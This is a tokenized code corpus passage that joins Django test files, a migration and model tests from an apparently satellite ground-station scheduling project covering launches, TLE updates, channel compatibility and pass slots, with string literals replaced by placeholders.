__ufo_tle_l2 = self . __leop_tle_l2 <EOL> self . __leop_2_tle_l1 = db_tools . TIANGONG_TLE [ <NUM_LIT:0> ] <EOL> self . __leop_2_tle_l2 = db_tools . TIANGONG_TLE [ <NUM_LIT:1> ] <EOL> if not self . __verbose_testing : <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( level = logging . CRITICAL ) <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( level = logging . CRITICAL ) <EOL> def test_list_groundstations ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> launch_jrpc . list_groundstations ( '<STR_LIT>' , ** { '<STR_LIT>' : None } ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except django_ex . PermissionDenied : <EOL> pass <EOL> try : <EOL> launch_jrpc . list_groundstations ( <EOL> self . __leop_id , ** { '<STR_LIT>' : self . __request_1 } <EOL> ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except django_ex . PermissionDenied : <EOL> pass <EOL> e_gs = { <EOL> launch_serial . JRPC_K_AVAILABLE_GS : [ <EOL> self . __gs_1_id , self . __gs_2_id <EOL> ] , <EOL> launch_serial . JRPC_K_IN_USE_GS : [ ] <EOL> } <EOL> try : <EOL> a_gs = launch_jrpc . list_groundstations ( <EOL> self . __leop_id , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> self . assertEqual ( a_gs , e_gs ) <EOL> except django_ex . PermissionDenied : <EOL> self . fail ( '<STR_LIT>' ) <EOL> launch_jrpc . add_groundstations ( <EOL> self . __leop_id , groundstations = [ self . __gs_1_id ] , <EOL> ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> e_gs = { <EOL> launch_serial . JRPC_K_AVAILABLE_GS : [ self . __gs_2_id ] , <EOL> launch_serial . JRPC_K_IN_USE_GS : [ self . __gs_1_id ] <EOL> } <EOL> a_gs = launch_jrpc . list_groundstations ( <EOL> self . __leop_id , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> self . assertEqual ( a_gs , e_gs ) <EOL> def test_add_groundstations ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> launch_jrpc . add_groundstations ( <EOL> '<STR_LIT>' , None , ** { '<STR_LIT>' : None } <EOL> ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except django_ex . PermissionDenied : <EOL> pass <EOL> try : <EOL> launch_jrpc . add_groundstations ( <EOL> '<STR_LIT>' , None , ** { '<STR_LIT>' : self . __request_1 } <EOL> ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except django_ex . PermissionDenied : <EOL> pass <EOL> try : <EOL> launch_jrpc . add_groundstations ( <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except launch_models . Launch . DoesNotExist : <EOL> pass <EOL> self . assertRaises ( <EOL> Exception , <EOL> launch_jrpc . add_groundstations , <EOL> None , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> gss = [ self . __gs_1_id , self . __gs_2_id ] <EOL> actual = launch_jrpc . add_groundstations ( <EOL> self . __leop_id , gss , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> expected = { launch_serial . JRPC_K_LEOP_ID : self . __leop_id } <EOL> self . assertEqual ( actual , expected ) <EOL> cluster = launch_models . Launch . objects . get ( identifier = self . __leop_id ) <EOL> self . assertEqual ( <EOL> len ( cluster . groundstations . all ( ) ) , <NUM_LIT:2> , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_remove_groundstations ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> django_ex . PermissionDenied , <EOL> launch_jrpc . remove_groundstations , <EOL> '<STR_LIT>' , None , ** { '<STR_LIT>' : None } <EOL> ) <EOL> self . assertRaises ( <EOL> django_ex . PermissionDenied , <EOL> launch_jrpc . remove_groundstations , <EOL> '<STR_LIT>' , None , ** { '<STR_LIT>' : self . __request_1 } <EOL> ) <EOL> self . assertRaises ( <EOL> launch_models . Launch . DoesNotExist , <EOL> launch_jrpc . remove_groundstations , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> actual = launch_jrpc . remove_groundstations ( <EOL> self . __leop_id , None , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> expected = { launch_serial . JRPC_K_LEOP_ID : self . __leop_id } <EOL> self . assertEqual ( actual , expected ) <EOL> actual = launch_jrpc . remove_groundstations ( <EOL> self . __leop_id , [ ] , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> expected = { launch_serial . JRPC_K_LEOP_ID : self . __leop_id } <EOL> self . assertEqual ( actual , expected ) <EOL> gss = [ self . __gs_1_id , self . __gs_2_id ] <EOL> launch_jrpc . add_groundstations ( <EOL> self . __leop_id , gss , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> cluster = launch_models . Launch . objects . get ( identifier = self . __leop_id ) <EOL> self . assertEqual ( <EOL> len ( cluster . groundstations . all ( ) ) , <NUM_LIT:2> , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertTrue ( <EOL> launch_jrpc . remove_groundstations ( <EOL> self . __leop_id , gss , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> len ( cluster . groundstations . all ( ) ) , <NUM_LIT:0> , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_add_unknown ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> Exception , launch_jrpc . add_unknown , self . __leop_id , None <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , launch_jrpc . add_unknown , self . __leop_id , - <NUM_LIT:1> <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . add_unknown ( self . __leop_id , <NUM_LIT:1> ) , <NUM_LIT:1> , <EOL> '<STR_LIT>' <EOL> ) <EOL> a_list = [ <EOL> a . identifier for a in launch_models . Launch . objects . get ( <EOL> identifier = self . __leop_id <EOL> ) . unknown_objects . all ( ) <EOL> ] <EOL> e_list = [ <NUM_LIT:1> ] <EOL> self . assertEqual ( a_list , e_list ) <EOL> def test_remove_unknown ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> Exception , launch_jrpc . remove_unknown , self . __leop_id , None <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , launch_jrpc . remove_unknown , self . __leop_id , - <NUM_LIT:1> <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , launch_jrpc . remove_unknown , self . __leop_id , <NUM_LIT:2> <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . add_unknown ( self . __leop_id , <NUM_LIT:1> ) , <NUM_LIT:1> , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertTrue ( <EOL> launch_jrpc . remove_unknown ( self . __leop_id , <NUM_LIT:1> ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> len ( launch_models . Launch . objects . get ( <EOL> identifier = self . __leop_id <EOL> ) . unknown_objects . all ( ) ) , <EOL> <NUM_LIT:0> , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_update_ufo ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> Exception , launch_jrpc . update , None , None , None , None , None <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , <EOL> launch_jrpc . update , <EOL> self . __leop_id , None , None , None , None <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , <EOL> launch_jrpc . update , <EOL> self . __leop_id , self . __ufo_id , None , None , None <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . add_unknown ( self . __leop_id , self . __ufo_id ) , <EOL> self . __ufo_id , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , <EOL> launch_jrpc . update , <EOL> self . __leop_id , self . __ufo_id , None , None , None <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . identify ( <EOL> self . __leop_id , self . __ufo_id , <EOL> self . __ufo_callsign , self . __ufo_tle_l1 , self . __ufo_tle_l2 <EOL> ) , <EOL> { <EOL> launch_serial . JRPC_K_OBJECT_ID : self . __ufo_id , <EOL> launch_serial . JRPC_K_SC_ID : self . __ufo_sc_id <EOL> } , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . update ( self . __leop_id , self . __ufo_id , None , None , None ) , <EOL> { <EOL> launch_serial . JRPC_K_OBJECT_ID : self . __ufo_id , <EOL> launch_serial . JRPC_K_SC_ID : self . __ufo_sc_id <EOL> } , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . update ( <EOL> self . __leop_id , self . __ufo_id , <EOL> self . __ufo_callsign , self . __ufo_tle_l1 , self . __ufo_tle_l2 <EOL> ) , <EOL> { <EOL> launch_serial . JRPC_K_OBJECT_ID : self . __ufo_id , <EOL> launch_serial . JRPC_K_SC_ID : self . __ufo_sc_id <EOL> } , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . update ( <EOL> self . __leop_id , self . __ufo_id , <EOL> self . __ufo_callsign , self . __leop_2_tle_l1 , self . __leop_2_tle_l2 <EOL> ) , <EOL> { <EOL> launch_serial . JRPC_K_OBJECT_ID : self . __ufo_id , <EOL> launch_serial . JRPC_K_SC_ID : self . __ufo_sc_id <EOL> } , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_get_configuration ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> launch_models . Launch . DoesNotExist , launch_jrpc . get_configuration , '<STR_LIT>' <EOL> ) <EOL> a_cfg = launch_jrpc . get_configuration ( self . __leop_id ) <EOL> e_cfg = { <EOL> launch_serial . JRPC_K_LEOP_ID : str ( self . __leop_id ) , <EOL> launch_serial . JRPC_K_SC_ID : str ( self . __leop_sc_id ) , <EOL> launch_serial . JRPC_K_DATE : self . __leop_serial_date , <EOL> launch_serial . JRPC_K_TLE_L1 : self . __leop_tle_l1 , <EOL> launch_serial . JRPC_K_TLE_L2 : self . __leop_tle_l2 , <EOL> launch_serial . JRPC_K_UNKNOWN_OBJECTS : [ ] , <EOL> launch_serial . JRPC_K_IDENTIFIED_OBJECTS : [ ] <EOL> } <EOL> self . assertEqual ( a_cfg , e_cfg ) <EOL> launch_jrpc . add_unknown ( self . __leop_id , <NUM_LIT:1> ) <EOL> a_cfg = launch_jrpc . get_configuration ( self . __leop_id ) <EOL> e_cfg = { <EOL> launch_serial . JRPC_K_LEOP_ID : str ( self . __leop_id ) , <EOL> launch_serial . JRPC_K_SC_ID : str ( self . __leop_sc_id ) , <EOL> launch_serial . JRPC_K_DATE : self . __leop_serial_date , <EOL> launch_serial . JRPC_K_TLE_L1 : self . __leop_tle_l1 , <EOL> launch_serial . JRPC_K_TLE_L2 : self . __leop_tle_l2 , <EOL> launch_serial . JRPC_K_UNKNOWN_OBJECTS : [ <EOL> { launch_serial . JRPC_K_OBJECT_ID : '<STR_LIT:1>' } <EOL> ] , <EOL> launch_serial . JRPC_K_IDENTIFIED_OBJECTS : [ ] <EOL> } <EOL> self . assertEqual ( a_cfg , e_cfg ) <EOL> launch_jrpc . add_unknown ( self . __leop_id , <NUM_LIT:2> ) <EOL> launch_jrpc . identify ( <EOL> self . __leop_id , self . __ufo_id , self . __ufo_callsign , <EOL> self . __ufo_tle_l1 , self . __ufo_tle_l2 <EOL> ) <EOL> a_cfg = launch_jrpc . get_configuration ( self . __leop_id ) <EOL> e_cfg = { <EOL> launch_serial . JRPC_K_LEOP_ID : str ( self . __leop_id ) , <EOL> launch_serial . JRPC_K_SC_ID : str ( self . __leop_sc_id ) , <EOL> launch_serial . JRPC_K_DATE : self . __leop_serial_date , <EOL> launch_serial . JRPC_K_TLE_L1 : self . __leop_tle_l1 , <EOL> launch_serial . JRPC_K_TLE_L2 : self . __leop_tle_l2 , <EOL> launch_serial . JRPC_K_UNKNOWN_OBJECTS : [ <EOL> { launch_serial . JRPC_K_OBJECT_ID : '<STR_LIT:2>' } <EOL> ] , <EOL> launch_serial . JRPC_K_IDENTIFIED_OBJECTS : [ { <EOL> launch_serial . JRPC_K_OBJECT_ID : '<STR_LIT:1>' , <EOL> launch_serial . JRPC_K_SC_ID : str ( self . __ufo_sc_id ) , <EOL> launch_serial . JRPC_K_CALLSIGN : str ( self . __ufo_callsign ) , <EOL> launch_serial . JRPC_K_TLE_L1 : self . __leop_tle_l1 , <EOL> launch_serial . JRPC_K_TLE_L2 : self . __leop_tle_l2 , <EOL> } ] <EOL> } <EOL> self . assertEqual ( a_cfg , e_cfg ) <EOL> launch_jrpc . forget ( self . __leop_id , self . __ufo_id ) <EOL> a_cfg = launch_jrpc . get_configuration ( self . __leop_id ) <EOL> e_cfg = { <EOL> launch_serial . JRPC_K_LEOP_ID : str ( self . __leop_id ) , <EOL> launch_serial . JRPC_K_SC_ID : str ( self . __leop_sc_id ) , <EOL> launch_serial . JRPC_K_DATE : self . __leop_serial_date , <EOL> launch_serial . JRPC_K_TLE_L1 : self . __leop_tle_l1 , <EOL> launch_serial . JRPC_K_TLE_L2 : self . __leop_tle_l2 , <EOL> launch_serial . JRPC_K_UNKNOWN_OBJECTS : [ <EOL> { launch_serial . JRPC_K_OBJECT_ID : '<STR_LIT:2>' } , <EOL> { launch_serial . JRPC_K_OBJECT_ID : '<STR_LIT:1>' } <EOL> ] , <EOL> launch_serial . JRPC_K_IDENTIFIED_OBJECTS : [ ] <EOL> } <EOL> if self . __verbose_testing : <EOL> misc . print_dictionary ( a_cfg ) <EOL> misc . print_dictionary ( e_cfg ) <EOL> self . assertEqual ( a_cfg , e_cfg ) <EOL> def test_set_configuration ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> launch_models . Launch . DoesNotExist , <EOL> launch_jrpc . set_configuration , '<STR_LIT>' , { } <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , <EOL> launch_jrpc . set_configuration , self . __leop_id , { } <EOL> ) <EOL> tomorrow = pytz . utc . localize ( <EOL> datetime . datetime . today ( ) + datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> ) <EOL> actual_date = launch_models . Launch . objects . get ( <EOL> identifier = self . __leop_id <EOL> ) . date <EOL> self . assertEqual ( <EOL> actual_date . isoformat ( ) , self . __leop_date . isoformat ( ) , <EOL> '<STR_LIT>' + str ( difflib . ndiff ( <EOL> actual_date . isoformat ( ) , self . __leop_date . isoformat ( ) <EOL> ) ) <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . set_configuration ( self . __leop_id , { <EOL> launch_serial . JRPC_K_DATE : str ( tomorrow . isoformat ( ) ) <EOL> } ) , <EOL> self . __leop_id , <EOL> '<STR_LIT>' <EOL> ) <EOL> actual_date = launch_models . Launch . objects . get ( <EOL> identifier = self . __leop_id <EOL> ) . date <EOL> self . assertEqual ( <EOL> actual_date . isoformat ( ) , tomorrow . isoformat ( ) , <EOL> '<STR_LIT>' + str ( difflib . ndiff ( <EOL> actual_date . isoformat ( ) , tomorrow . isoformat ( ) <EOL> ) ) <EOL> ) <EOL> old_gt = simulation_models . GroundTrack . objects . get ( tle = self . __leop . tle ) <EOL> self . assertEqual ( <EOL> launch_jrpc . set_configuration ( self . __leop_id , { <EOL> launch_serial . JRPC_K_DATE : str ( tomorrow . isoformat ( ) ) , <EOL> launch_serial . JRPC_K_TLE_L1 : self . __leop_2_tle_l1 , <EOL> launch_serial . JRPC_K_TLE_L2 : self . __leop_2_tle_l2 , <EOL> } ) , <EOL> self . __leop_id , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertTrue ( <EOL> tle_models . TwoLineElement . objects . filter ( <EOL> first_line = self . __leop_2_tle_l1 <EOL> ) . exists ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertTrue ( <EOL> tle_models . TwoLineElement . objects . filter ( <EOL> second_line = self . __leop_2_tle_l2 <EOL> ) . exists ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> new_gt = simulation_models . GroundTrack . objects . get ( tle = self . __leop . tle ) <EOL> self . assertNotEqual ( old_gt , new_gt , '<STR_LIT>' ) <EOL> def test_get_passes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> launch_jrpc . get_pass_slots ( self . __leop_id ) , <EOL> [ ] , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . add_groundstations ( <EOL> self . __leop_id , [ self . __gs_1_id ] , <EOL> ** { '<STR_LIT>' : self . __request_2 } <EOL> ) , <EOL> { launch_serial . JRPC_K_LEOP_ID : self . __leop_id } , <EOL> '<STR_LIT>' <EOL> ) <EOL> launch_jrpc . add_unknown ( self . __leop_id , self . __ufo_id ) <EOL> launch_jrpc . identify ( <EOL> self . __leop_id , self . __ufo_id , self . __ufo_callsign , <EOL> self . __ufo_tle_l1 , self . __ufo_tle_l2 <EOL> ) <EOL> slots = launch_jrpc . get_pass_slots ( self . __leop_id ) <EOL> self . assertNotEqual ( <EOL> len ( slots ) , <NUM_LIT:0> , '<STR_LIT>' <EOL> ) <EOL> def test_list_sc ( self ) : <EOL> """<STR_LIT>""" <EOL> launch_jrpc . list_spacecraft ( <EOL> self . __leop_id , ** { '<STR_LIT>' : self . __request_2 } <EOL> ) <EOL> def _test_get_messages ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> launch_models . Launch . DoesNotExist , <EOL> messages_jrpc . get_messages , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , messages_jrpc . get_messages , self . __leop_id , None <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , messages_jrpc . get_messages , self . __leop_id , None <EOL> ) <EOL> self . assertRaises ( <EOL> Exception , messages_jrpc . get_messages , self . __leop_id , '<STR_LIT:null>' <EOL> ) <EOL> self . assertEqual ( <EOL> messages_jrpc . get_messages ( <EOL> self . __leop_id , '<STR_LIT>' <EOL> ) , <EOL> [ ] , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> launch_jrpc . add_groundstations ( <EOL> self . __leop_id , [ self . __gs_1_id ] , <EOL> ** { '<STR_LIT>' : self . __request_2 } <EOL> ) , <EOL> { launch_serial . JRPC_K_LEOP_ID : self . __leop_id } , <EOL> '<STR_LIT>' <EOL> ) <EOL> message_1 = db_tools . create_message ( self . __gs_1 ) <EOL> yesterday = misc . get_now_utc ( ) - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> actual = messages_jrpc . get_messages ( <EOL> self . __leop_id , yesterday . isoformat ( ) <EOL> ) <EOL> expected = [ { <EOL> launch_serial . JRPC_K_GS_ID : self . __gs_1_id , <EOL> messages_serial . JRPC_K_TS : message_1 . groundstation_timestamp , <EOL> messages_serial . JRPC_K_MESSAGE : db_tools . MESSAGE__1_TEST <EOL> } ] <EOL> self . assertEqual ( actual , expected ) <EOL> self . assertEqual ( <EOL> launch_jrpc . add_groundstations ( <EOL> self . __leop_id , [ self . __gs_2_id ] , <EOL> ** { '<STR_LIT>' : self . __request_2 } <EOL> ) , <EOL> { launch_serial . JRPC_K_LEOP_ID : self . __leop_id } , <EOL> '<STR_LIT>' <EOL> ) <EOL> message_2 = db_tools . create_message ( <EOL> self . __gs_2 , message = db_tools . MESSAGE_BASE64 <EOL> ) <EOL> yesterday = misc . get_now_utc ( ) - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> actual = messages_jrpc . get_messages ( <EOL> self . __leop_id , yesterday . isoformat ( ) <EOL> ) <EOL> expected . append ( { <EOL> launch_serial . JRPC_K_GS_ID : self . __gs_2_id , <EOL> messages_serial . JRPC_K_TS : message_2 . groundstation_timestamp , <EOL> messages_serial . JRPC_K_MESSAGE : db_tools . MESSAGE_BASE64 . decode ( ) <EOL> } ) <EOL> self . assertEqual ( actual , expected ) </s>
<s> from django . db import models , migrations <EOL> import django . db . models . deletion <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( unique = True , max_length = <NUM_LIT> , verbose_name = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:start>' , models . DateTimeField ( verbose_name = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:end>' , models . DateTimeField ( verbose_name = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:state>' , models . CharField ( default = '<STR_LIT>' , max_length = <NUM_LIT:10> , verbose_name = b'<STR_LIT>' , choices = [ ( '<STR_LIT>' , b'<STR_LIT>' ) , ( '<STR_LIT>' , b'<STR_LIT>' ) , ( '<STR_LIT>' , b'<STR_LIT>' ) , ( '<STR_LIT>' , b'<STR_LIT>' ) , ( '<STR_LIT>' , b'<STR_LIT>' ) , ( '<STR_LIT>' , b'<STR_LIT>' ) ] ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , verbose_name = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , verbose_name = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( on_delete = django . db . models . deletion . SET_NULL , verbose_name = b'<STR_LIT>' , blank = True , to = '<STR_LIT>' , null = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( on_delete = django . db . models . deletion . SET_NULL , verbose_name = b'<STR_LIT>' , blank = True , to = '<STR_LIT>' , null = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( on_delete = django . db . models . deletion . SET_NULL , verbose_name = b'<STR_LIT>' , blank = True , to = '<STR_LIT>' , null = True ) ) , <EOL> ] , <EOL> options = { <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
<s> import logging <EOL> from django import test <EOL> from services . common import helpers as db_tools <EOL> from services . scheduling . jrpc . views import compatibility as compatibility_jrpc <EOL> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> class TestCompatibilityViews ( test . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __verbose_testing = False <EOL> if not self . __verbose_testing : <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( level = logging . CRITICAL ) <EOL> from services . scheduling . signals import compatibility <EOL> self . __gs_1_id = '<STR_LIT>' <EOL> self . __gs_1_ch_1_id = '<STR_LIT>' <EOL> self . __gs_1_ch_2_id = '<STR_LIT>' <EOL> self . __band = db_tools . create_band ( ) <EOL> self . __user_profile = db_tools . create_user_profile ( ) <EOL> self . __gs_1 = db_tools . create_gs ( <EOL> user_profile = self . __user_profile , identifier = self . __gs_1_id , <EOL> ) <EOL> self . __gs_1_ch_1 = db_tools . gs_add_channel ( <EOL> self . __gs_1 , self . __band , self . __gs_1_ch_1_id <EOL> ) <EOL> self . __gs_1_ch_2 = db_tools . gs_add_channel ( <EOL> self . __gs_1 , self . __band , self . __gs_1_ch_2_id <EOL> ) <EOL> self . __sc_1_id = '<STR_LIT>' <EOL> self . __sc_1_ch_1_id = '<STR_LIT>' <EOL> self . __sc_1_ch_1_f = <NUM_LIT> <EOL> self . __sc_1_ch_2_id = '<STR_LIT>' <EOL> self . __sc_1 = db_tools . create_sc ( <EOL> user_profile = self . __user_profile , <EOL> identifier = self . __sc_1_id <EOL> ) <EOL> self . __sc_1_ch_1 = db_tools . sc_add_channel ( <EOL> self . __sc_1 , self . __sc_1_ch_1_f , self . __sc_1_ch_1_id , <EOL> ) <EOL> def test_sc_channel_get_compatible ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . __verbose_testing : <EOL> print ( '<STR_LIT>' ) <EOL> c = compatibility_jrpc . sc_channel_get_compatible ( <EOL> self . __sc_1_id , self . __sc_1_ch_1_id <EOL> ) <EOL> self . assertEquals ( c [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . __gs_1_id ) <EOL> def test_sc_get_compatible ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . __verbose_testing : <EOL> print ( '<STR_LIT>' ) <EOL> r = compatibility_jrpc . sc_get_compatible ( self . __sc_1_id ) <EOL> self . assertEquals ( <EOL> r [ '<STR_LIT>' ] , self . __sc_1_id <EOL> ) <EOL> self . assertEquals ( <EOL> r [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from datetime import timedelta as py_timedelta <EOL> from django import test <EOL> import logging <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> from services . common import misc as sn_misc <EOL> from services . common import helpers as db_tools <EOL> from services . configuration . models import tle as tle_models <EOL> from services . simulation . models import passes as pass_models <EOL> class TestModels ( test . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __verbose_testing = False <EOL> self . __user = db_tools . create_user_profile ( ) <EOL> self . __request_1 = db_tools . create_request ( user_profile = self . __user ) <EOL> self . __gs_1_id = '<STR_LIT>' <EOL> self . __gs_1 = db_tools . create_gs ( <EOL> user_profile = self . __user , identifier = self . __gs_1_id <EOL> ) <EOL> self . __sc_1_id = '<STR_LIT>' <EOL> self . __sc_1_tle_id = '<STR_LIT>' <EOL> self . __sc_1 = db_tools . create_sc ( <EOL> user_profile = self . __user , <EOL> identifier = self . __sc_1_id , tle_id = self . __sc_1_tle_id , <EOL> ) <EOL> def test_pass_models ( self ) : <EOL> """<STR_LIT>""" <EOL> sc_slots_1 = pass_models . PassSlots . objects . create_pass_slots_sc ( <EOL> self . __sc_1 <EOL> ) <EOL> self . assertIsNot ( <EOL> len ( sc_slots_1 ) , <NUM_LIT:0> , <EOL> '<STR_LIT>' <EOL> ) <EOL> gs_slots_1 = pass_models . PassSlots . objects . create_pass_slots_gs ( <EOL> self . __gs_1 <EOL> ) <EOL> self . assertIsNot ( <EOL> len ( gs_slots_1 ) , <NUM_LIT:0> , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertTrue ( <EOL> pass_models . PassSlots . objects . filter ( <EOL> spacecraft = self . __sc_1 <EOL> ) . exists ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertTrue ( <EOL> pass_models . PassSlots . objects . filter ( <EOL> groundstation = self . __gs_1 <EOL> ) . exists ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> pass_models . PassSlots . objects . remove_pass_slots_sc ( self . __sc_1 ) <EOL> self . assertFalse ( <EOL> pass_models . PassSlots . objects . filter ( <EOL> spacecraft = self . __sc_1 <EOL> ) . exists ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> pass_models . PassSlots . objects . remove_pass_slots_gs ( self . __gs_1 ) <EOL> self . assertFalse ( <EOL> pass_models . PassSlots . objects . filter ( <EOL> groundstation = self . __gs_1 <EOL> ) . exists ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_create_passes ( self ) : <EOL> """<STR_LIT>""" <EOL> slot_s = sn_misc . get_next_midnight ( ) <EOL> slot_e = slot_s + py_timedelta ( days = <NUM_LIT:1> ) <EOL> self . assertIsNotNone ( <EOL> pass_models . PassSlots . objects . create ( <EOL> spacecraft = self . __sc_1 , groundstation = self . __gs_1 , <EOL> start = slot_s , end = slot_e <EOL> ) <EOL> ) <EOL> self . assertIsNone ( <EOL> pass_models . PassSlots . objects . create ( <EOL> spacecraft = self . __sc_1 , groundstation = self . __gs_1 , <EOL> start = slot_s , end = slot_e <EOL> ) <EOL> ) <EOL> slot_s = slot_s + py_timedelta ( days = <NUM_LIT:1> ) <EOL> slot_e = slot_s + py_timedelta ( days = <NUM_LIT:1> ) <EOL> self . assertIsNotNone ( <EOL> pass_models . PassSlots . objects . create ( <EOL> spacecraft = self . __sc_1 , groundstation = self . __gs_1 , <EOL> start = slot_s , end = slot_e <EOL> ) <EOL> ) <EOL> self . assertIsNone ( <EOL> pass_models . PassSlots . objects . create ( <EOL> spacecraft = self . __sc_1 , groundstation = self . __gs_1 , <EOL> start = slot_s , end = slot_e <EOL> ) <EOL> ) <EOL> def test_firebird ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __tle_fb = tle_models . TwoLineElement . objects . create ( <EOL> '<STR_LIT>' , <EOL> db_tools . ISS_TLE_ID , db_tools . ISS_TLE [ <NUM_LIT:0> ] , db_tools . ISS_TLE [ <NUM_LIT:1> ] <EOL> ) <EOL> self . __sc_fb = db_tools . create_sc ( <EOL> user_profile = self . __user , tle_id = db_tools . ISS_TLE_ID <EOL> ) <EOL> self . __gs_uvigo_id = '<STR_LIT>' <EOL> self . __gs_uvigo_e = <NUM_LIT:0> <EOL> self . __gs_uvigo_lat = <NUM_LIT> <EOL> self . __gs_uvigo_lng = - <NUM_LIT> <EOL> self . __gs_uvigo = db_tools . create_gs ( <EOL> user_profile = self . __user , <EOL> identifier = self . __gs_uvigo_id , <EOL> latitude = self . __gs_uvigo_lat , <EOL> longitude = self . __gs_uvigo_lng , <EOL> contact_elevation = self . __gs_uvigo_e <EOL> ) <EOL> def test_passes_reboot ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' ) 